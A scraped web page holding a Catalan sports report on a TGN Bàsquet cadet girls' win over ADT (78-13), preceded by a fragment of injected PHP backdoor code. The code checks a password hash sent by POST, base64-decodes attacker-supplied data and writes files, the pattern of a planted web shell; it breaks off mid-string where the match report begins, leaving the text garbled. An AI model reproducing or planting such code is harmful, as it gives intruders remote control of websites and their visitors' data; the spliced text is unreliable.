function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El cadet femení B fa un parcial de 35-1 abans del descans i tomba l'ADT (78-13) - Tgn Bàsquet Club -

El cadet femení B fa un parcial de 35-1 abans del descans i tomba l’ADT (78-13)

Updated: maig 19, 2015

El cadet femení B del TGN Bàsquet va fer un partit magnífic i  es va imposar amb claredat a l’ADT en un matx que es va resoldre en la primera meitat. Així, l’equip de Torreforta va començar molt fort i amb parcial de 2-5 dominava en el resultat. Amb tot, les noies que dirigeix Agustí Oriol no van badar i la seva reacció va ser espectacular. La gran defensa local va ser el pal de paller de la victòria i el malson visitant. Un parcial increïble de 35-1 va deixar el matx vist per sentència (37-6 al descans). Malgrat la diferència, el TGN Bàsquet va continuar treballant sobre la pista i l’avantatge va anar agumentant.